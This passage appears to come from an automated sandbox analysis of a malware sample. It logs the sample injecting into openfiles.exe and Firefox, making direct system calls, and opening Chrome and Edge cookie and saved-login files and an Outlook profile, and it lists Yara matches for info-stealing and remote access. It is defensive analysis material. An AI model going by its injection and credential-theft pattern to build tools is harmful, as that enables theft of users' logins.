                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtSetInformationThread: Direct from: 0x76EF63F9
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtCreateFile: Direct from: 0x76F02FEC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtOpenFile: Direct from: 0x76F02DCC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtTerminateThread: Direct from: 0x76F02FCC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtCreateMutant: Direct from: 0x76F035CC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtResumeThread: Direct from: 0x76F036AC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtReadFile: Direct from: 0x76F02ADC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtDelayExecution: Direct from: 0x76F02DDC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtResumeThread: Direct from: 0x76F02FBC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtCreateUserProcess: Direct from: 0x76F0371C
                      Source: C:\Users\user\Desktop\IETC-24017.exe Memory written: C:\Users\user\Desktop\IETC-24017.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\IETC-24017.exe Section loaded: NULL target: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\IETC-24017.exe Section loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe protection: read write
                      Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\openfiles.exe Thread register set: target process: 7732
                      Source: C:\Users\user\Desktop\IETC-24017.exe Process created: C:\Users\user\Desktop\IETC-24017.exe "C:\Users\user\Desktop\IETC-24017.exe"
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
                      Source: C:\Windows\SysWOW64\openfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: UFUUPGsATdE.exe, 00000006.00000000.1744026689.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000002.4124546108.00000000017A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: UFUUPGsATdE.exe, 00000006.00000000.1744026689.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000002.4124546108.00000000017A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                      Source: UFUUPGsATdE.exe, 00000006.00000000.1744026689.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000002.4124546108.00000000017A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                      Source: UFUUPGsATdE.exe, 00000006.00000000.1744026689.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000002.4124546108.00000000017A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                      Source: C:\Users\user\Desktop\IETC-24017.exe Queries volume information: C:\Users\user\Desktop\IETC-24017.exe VolumeInformation
                      Source: C:\Users\user\Desktop\IETC-24017.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\IETC-24017.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\IETC-24017.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\IETC-24017.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match, File source: 3.2.IETC-24017.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 3.2.IETC-24017.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000003.00000002.1822234803.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4124625092.00000000046F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.4124804278.0000000004D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000003.00000002.1824149461.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0.2.IETC-24017.exe.6d90000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.IETC-24017.exe.371e790.1.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.IETC-24017.exe.6d90000.3.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.IETC-24017.exe.371e790.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000000.00000002.1692106162.0000000006D90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000000.00000002.1686417175.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\openfiles.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\openfiles.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\openfiles.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\openfiles.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\openfiles.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\openfiles.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\openfiles.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\openfiles.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\openfiles.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Source: Yara match, File source: 3.2.IETC-24017.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 3.2.IETC-24017.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
